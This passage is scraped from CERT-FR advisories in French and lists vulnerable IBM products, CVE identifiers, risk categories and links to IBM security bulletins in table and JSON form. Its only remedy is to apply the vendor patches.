"title": "Bulletin de s\u00e9curit\u00e9 IBM 7234068",
"url": "https://www.ibm.com/support/pages/node/7234068"
},
{
"published_at": "2025-05-16",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7233442",
"url": "https://www.ibm.com/support/pages/node/7233442"
},
{
"published_at": "2025-05-20",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7233972",
"url": "https://www.ibm.com/support/pages/node/7233972"
},
{
"published_at": "2025-05-20",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7234028",
"url": "https://www.ibm.com/support/pages/node/7234028"
}
]
}
CERTFR-2025-AVI-0546
Vulnerability from certfr_avis - Published: - Updated:
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, une élévation de privilèges et un déni de service à distance.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | WebSphere | WebSphere Application Server versions 8.5.x sans les derniers correctifs de sécurité | ||
| IBM | WebSphere Service Registry and Repository | WebSphere Service Registry and Repository sans les derniers correctifs de sécurité | ||
| IBM | Sterling Connect:Direct | Sterling Connect:Direct Web services versions 6.4.x antérieures à 6.4.0.3 | ||
| IBM | WebSphere | WebSphere Application Server versions 9.0.x sans les derniers correctifs de sécurité | ||
| IBM | Sterling Connect:Direct | Sterling Connect:Direct Web services versions 6.3.x antérieures à 6.3.0.14 | ||
| IBM | Spectrum | Spectrum Protect Plus versions 10.1.x antérieures à 10.1.17.1 | ||
| IBM | QRadar | QRadar Hub versions antérieures à 3.8.3 | ||
| IBM | AIX | AIX versions 7.3.x sans les derniers correctif de sécurité | ||
| IBM | Db2 | DB2 Data Management Console pour CPD versions antérieures à 4.8.7 | ||
| IBM | QRadar Deployment Intelligence App | QRadar Deployment Intelligence App versions antérieures à 3.0.17 |
References
| Title | Publication Time | Tags | ||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "WebSphere Application Server versions 8.5.x sans les derniers correctifs de s\u00e9curit\u00e9",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Service Registry and Repository sans les derniers correctifs de s\u00e9curit\u00e9",
"product": {
"name": "WebSphere Service Registry and Repository",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Connect:Direct Web services versions 6.4.x ant\u00e9rieures \u00e0 6.4.0.3",
"product": {
"name": "Sterling Connect:Direct",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Application Server versions 9.0.x sans les derniers correctifs de s\u00e9curit\u00e9",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Connect:Direct Web services versions 6.3.x ant\u00e9rieures \u00e0 6.3.0.14",
"product": {
"name": "Sterling Connect:Direct",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Spectrum Protect Plus versions 10.1.x ant\u00e9rieures \u00e0 10.1.17.1",
"product": {
"name": "Spectrum",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar Hub versions ant\u00e9rieures \u00e0 3.8.3",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "AIX versions 7.3.x sans les derniers correctif de s\u00e9curit\u00e9",
"product": {
"name": "AIX",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "DB2 Data Management Console pour CPD versions ant\u00e9rieures \u00e0 4.8.7",
"product": {
"name": "Db2",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar Deployment Intelligence App versions ant\u00e9rieures \u00e0 3.0.17",
"product": {
"name": "QRadar Deployment Intelligence App",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2023-25577",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-25577"
},
{
"name": "CVE-2024-37891",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-37891"
},
{
"name": "CVE-2025-27516",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27516"
},
{
"name": "CVE-2024-49766",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49766"
},
{
"name": "CVE-2023-23934",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-23934"
},
{
"name": "CVE-2024-34069",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34069"
},
{
"name": "CVE-2024-8176",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8176"
},
{
"name": "CVE-2020-29651",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-29651"
},
{
"name": "CVE-2024-45590",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45590"
},
{
"name": "CVE-2024-8305",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8305"
},
{
"name": "CVE-2023-1409",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1409"
},
{
"name": "CVE-2024-45338",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45338"
},
{
"name": "CVE-2024-7553",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7553"
},
{
"name": "CVE-2024-36124",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36124"
},
{
"name": "CVE-2024-56406",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56406"
},
{
"name": "CVE-2025-27152",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27152"
},
{
"name": "CVE-2024-22195",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22195"
},
{
"name": "CVE-2024-8207",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8207"
},
{
"name": "CVE-2024-3372",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-3372"
},
{
"name": "CVE-2025-33214",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-33214"
},
{
"name": "CVE-2024-45296",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45296"
},
{
"name": "CVE-2023-46136",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-46136"
},
{
"name": "CVE-2024-35195",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35195"
},
{
"name": "CVE-2019-20916",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-20916"
},
{
"name": "CVE-2020-7789",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-7789"
},
{
"name": "CVE-2024-52798",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52798"
},
{
"name": "CVE-2024-49767",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49767"
},
{
"name": "CVE-2025-41232",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-41232"
},
{
"name": "CVE-2025-22870",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22870"
},
{
"name": "CVE-2023-1077",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1077"
},
{
"name": "CVE-2025-27789",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27789"
},
{
"name": "CVE-2022-42969",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-42969"
},
{
"name": "CVE-2023-30861",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-30861"
},
{
"name": "CVE-2024-34064",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34064"
},
{
"name": "CVE-2023-32681",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-32681"
},
{
"name": "CVE-2024-56334",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56334"
},
{
"name": "CVE-2020-28493",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-28493"
},
{
"name": "CVE-2024-6375",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6375"
},
{
"name": "CVE-2025-36038",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36038"
},
{
"name": "CVE-2024-6345",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6345"
}
],
"links": [],
"reference": "CERTFR-2025-AVI-0546",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-06-27T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, une \u00e9l\u00e9vation de privil\u00e8ges et un d\u00e9ni de service \u00e0 distance.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2025-06-27",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238297",
"url": "https://www.ibm.com/support/pages/node/7238297"
},
{
"published_at": "2025-06-23",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7237702",
"url": "https://www.ibm.com/support/pages/node/7237702"
},
{
"published_at": "2025-06-25",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7237967",
"url": "https://www.ibm.com/support/pages/node/7237967"
},
{
"published_at": "2025-06-26",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238168",
"url": "https://www.ibm.com/support/pages/node/7238168"
},
{
"published_at": "2025-06-26",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238156",
"url": "https://www.ibm.com/support/pages/node/7238156"
},
{
"published_at": "2025-06-26",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238155",
"url": "https://www.ibm.com/support/pages/node/7238155"
},
{
"published_at": "2025-06-27",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238295",
"url": "https://www.ibm.com/support/pages/node/7238295"
},
{
"published_at": "2025-06-26",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7238159",
"url": "https://www.ibm.com/support/pages/node/7238159"
}
]
}
CERTFR-2025-AVI-0279
Vulnerability from certfr_avis - Published: - Updated:
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, une élévation de privilèges et un déni de service à distance.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | Db2 | Db2 versions antérieures à 5.1.2 pour Cloud Pak for Data | ||
| IBM | WebSphere | WebSphere Application Server Liberty sans le correctif APAR PH65394 | ||
| IBM | Db2 Warehouse | Db2 Warehouse versions antérieures à 5.1.2 pour Cloud Pak for Data | ||
| IBM | WebSphere | WebSphere Hybrid Edition sans le dernier correctif de sécurité | ||
| IBM | QRadar Analyst Workflow | QRadar Analyst Workflow versions antérieures à 3.0.0 |
References
| Title | Publication Time | Tags | |||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Db2 versions ant\u00e9rieures \u00e0 5.1.2 pour Cloud Pak for Data",
"product": {
"name": "Db2",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Application Server Liberty sans le correctif APAR PH65394",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Db2 Warehouse versions ant\u00e9rieures \u00e0 5.1.2 pour Cloud Pak for Data",
"product": {
"name": "Db2 Warehouse",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Hybrid Edition sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar Analyst Workflow versions ant\u00e9rieures \u00e0 3.0.0",
"product": {
"name": "QRadar Analyst Workflow",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2021-44906",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44906"
},
{
"name": "CVE-2023-45857",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45857"
},
{
"name": "CVE-2023-45142",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45142"
},
{
"name": "CVE-2022-48890",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48890"
},
{
"name": "CVE-2024-35176",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35176"
},
{
"name": "CVE-2024-37071",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-37071"
},
{
"name": "CVE-2025-25285",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25285"
},
{
"name": "CVE-2024-6232",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6232"
},
{
"name": "CVE-2024-34997",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34997"
},
{
"name": "CVE-2024-51479",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-51479"
},
{
"name": "CVE-2024-43398",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43398"
},
{
"name": "CVE-2024-35946",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35946"
},
{
"name": "CVE-2023-44487",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-44487"
},
{
"name": "CVE-2024-41761",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41761"
},
{
"name": "CVE-2022-29153",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-29153"
},
{
"name": "CVE-2023-52605",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52605"
},
{
"name": "CVE-2021-23337",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-23337"
},
{
"name": "CVE-2018-6341",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-6341"
},
{
"name": "CVE-2023-52455",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52455"
},
{
"name": "CVE-2024-45338",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45338"
},
{
"name": "CVE-2025-27152",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27152"
},
{
"name": "CVE-2024-26740",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26740"
},
{
"name": "CVE-2024-47764",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47764"
},
{
"name": "CVE-2025-25288",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25288"
},
{
"name": "CVE-2024-35790",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35790"
},
{
"name": "CVE-2022-48921",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48921"
},
{
"name": "CVE-2024-45296",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45296"
},
{
"name": "CVE-2025-25290",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25290"
},
{
"name": "CVE-2024-45337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45337"
},
{
"name": "CVE-2024-39908",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-39908"
},
{
"name": "CVE-2021-47495",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-47495"
},
{
"name": "CVE-2024-41946",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41946"
},
{
"name": "CVE-2023-52832",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52832"
},
{
"name": "CVE-2024-41110",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41110"
},
{
"name": "CVE-2024-27281",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27281"
},
{
"name": "CVE-2024-52798",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52798"
},
{
"name": "CVE-2023-43804",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-43804"
},
{
"name": "CVE-2024-6484",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6484"
},
{
"name": "CVE-2020-13844",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-13844"
},
{
"name": "CVE-2024-26776",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26776"
},
{
"name": "CVE-2024-6485",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6485"
},
{
"name": "CVE-2024-41762",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41762"
},
{
"name": "CVE-2024-39494",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-39494"
},
{
"name": "CVE-2025-23184",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23184"
},
{
"name": "CVE-2024-6119",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6119"
},
{
"name": "CVE-2021-4204",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-4204"
},
{
"name": "CVE-2024-26843",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26843"
},
{
"name": "CVE-2024-40679",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-40679"
},
{
"name": "CVE-2023-52885",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52885"
},
{
"name": "CVE-2018-20225",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-20225"
},
{
"name": "CVE-2019-11253",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-11253"
},
{
"name": "CVE-2023-52898",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52898"
},
{
"name": "CVE-2025-25289",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25289"
},
{
"name": "CVE-2024-45663",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45663"
},
{
"name": "CVE-2023-52467",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52467"
},
{
"name": "CVE-2024-41123",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41123"
},
{
"name": "CVE-2024-36620",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36620"
},
{
"name": "CVE-2022-48706",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48706"
},
{
"name": "CVE-2024-49761",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49761"
}
],
"links": [],
"reference": "CERTFR-2025-AVI-0279",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-04-04T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Injection de requ\u00eates ill\u00e9gitimes par rebond (CSRF)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, une \u00e9l\u00e9vation de privil\u00e8ges et un d\u00e9ni de service \u00e0 distance.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2025-04-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7230024",
"url": "https://www.ibm.com/support/pages/node/7230024"
},
{
"published_at": "2025-04-01",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7229770",
"url": "https://www.ibm.com/support/pages/node/7229770"
},
{
"published_at": "2025-03-28",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7229443",
"url": "https://www.ibm.com/support/pages/node/7229443"
},
{
"published_at": "2025-04-01",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7229768",
"url": "https://www.ibm.com/support/pages/node/7229768"
},
{
"published_at": "2025-04-01",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7229772",
"url": "https://www.ibm.com/support/pages/node/7229772"
}
]
}
CERTFR-2025-AVI-0562
Vulnerability from certfr_avis - Published: - Updated:
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | Db2 | DB2 Data Management Console versions 3.1.x postérieures à 3.1.11 et antérieures à 3.1.13.1 | ||
| IBM | Cognos Analytics | Cognos Analytics versions 11.2.x antérieures à 11.2.4 FP6 | ||
| IBM | Sterling | Sterling Transformation Extender version 10.1.1.1 sans le correctif de sécurité APAR PH67014 | ||
| IBM | Sterling | Sterling Transformation Extender version 11.0.0.0 sans le correctif de sécurité APAR PH67014 | ||
| IBM | Sterling | Sterling Transformation Extender version 10.1.0.2 sans le correctif de sécurité APAR PH67014 | ||
| IBM | Cognos Analytics | Cognos Analytics versions 12.0.x antérieures à 12.0.4 FP1 | ||
| IBM | Sterling | Sterling Transformation Extender version 10.1.2.1 sans le correctif de sécurité APAR PH67014 | ||
| IBM | Informix Dynamic Server | Informix Dynamic Server versions 14.10.x antérieures à 14.10.xC11W2 | ||
| IBM | Sterling Connect:Direct | Sterling Connect:Direct File Agent versions 1.4.0.x antérieures à 1.4.0.4 | ||
| IBM | Sterling | Sterling Transformation Extender versions 11.0.1.x antérieures à 11.0.1.1 sans le correctif de sécurité APAR PH67016 | ||
| IBM | Db2 | DB2 Data Management Console pour CPD versions antérieures à 5.1.2 | ||
| IBM | Informix Dynamic Server | Informix Dynamic Server versions 12.10.x antérieures à 12.10.xC16W2 |
References
| Title | Publication Time | Tags | |||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "DB2 Data Management Console versions 3.1.x post\u00e9rieures \u00e0 3.1.11 et ant\u00e9rieures \u00e0 3.1.13.1",
"product": {
"name": "Db2",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Cognos Analytics versions 11.2.x ant\u00e9rieures \u00e0 11.2.4 FP6",
"product": {
"name": "Cognos Analytics",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Transformation Extender version 10.1.1.1 sans le correctif de s\u00e9curit\u00e9 \n APAR PH67014",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Transformation Extender version 11.0.0.0 sans le correctif de s\u00e9curit\u00e9 \n APAR PH67014",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Transformation Extender version 10.1.0.2 sans le correctif de s\u00e9curit\u00e9 \n APAR PH67014",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Cognos Analytics versions 12.0.x ant\u00e9rieures \u00e0 12.0.4 FP1",
"product": {
"name": "Cognos Analytics",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Transformation Extender version 10.1.2.1 sans le correctif de s\u00e9curit\u00e9 \n APAR PH67014",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Informix Dynamic Server versions 14.10.x ant\u00e9rieures \u00e0 14.10.xC11W2",
"product": {
"name": "Informix Dynamic Server",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Connect:Direct File Agent versions 1.4.0.x ant\u00e9rieures \u00e0 1.4.0.4",
"product": {
"name": "Sterling Connect:Direct",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Transformation Extender versions 11.0.1.x ant\u00e9rieures \u00e0 11.0.1.1 sans le correctif de s\u00e9curit\u00e9 \n APAR PH67016",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "DB2 Data Management Console pour CPD versions ant\u00e9rieures \u00e0 5.1.2",
"product": {
"name": "Db2",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Informix Dynamic Server versions 12.10.x ant\u00e9rieures \u00e0 12.10.xC16W2",
"product": {
"name": "Informix Dynamic Server",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2024-21235",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21235"
},
{
"name": "CVE-2025-4447",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4447"
},
{
"name": "CVE-2024-21144",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21144"
},
{
"name": "CVE-2021-43816",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-43816"
},
{
"name": "CVE-2024-21534",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21534"
},
{
"name": "CVE-2025-24970",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24970"
},
{
"name": "CVE-2022-32149",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32149"
},
{
"name": "CVE-2024-10917",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-10917"
},
{
"name": "CVE-2025-1302",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1302"
},
{
"name": "CVE-2025-27152",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27152"
},
{
"name": "CVE-2025-21587",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21587"
},
{
"name": "CVE-2024-7254",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7254"
},
{
"name": "CVE-2024-52900",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52900"
},
{
"name": "CVE-2024-47535",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47535"
},
{
"name": "CVE-2025-30698",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30698"
},
{
"name": "CVE-2024-27289",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27289"
},
{
"name": "CVE-2022-41721",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41721"
},
{
"name": "CVE-2025-25193",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25193"
},
{
"name": "CVE-2024-21145",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21145"
},
{
"name": "CVE-2024-4741",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4741"
},
{
"name": "CVE-2025-2900",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-2900"
},
{
"name": "CVE-2025-1991",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1991"
},
{
"name": "CVE-2022-23648",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-23648"
},
{
"name": "CVE-2023-39325",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39325"
},
{
"name": "CVE-2024-21131",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21131"
},
{
"name": "CVE-2024-21210",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21210"
},
{
"name": "CVE-2024-2511",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-2511"
},
{
"name": "CVE-2022-21698",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21698"
},
{
"name": "CVE-2024-21217",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21217"
},
{
"name": "CVE-2024-27267",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27267"
},
{
"name": "CVE-2022-27664",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-27664"
},
{
"name": "CVE-2024-21208",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21208"
}
],
"links": [],
"reference": "CERTFR-2025-AVI-0562",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-07-04T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Injection SQL (SQLi)"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
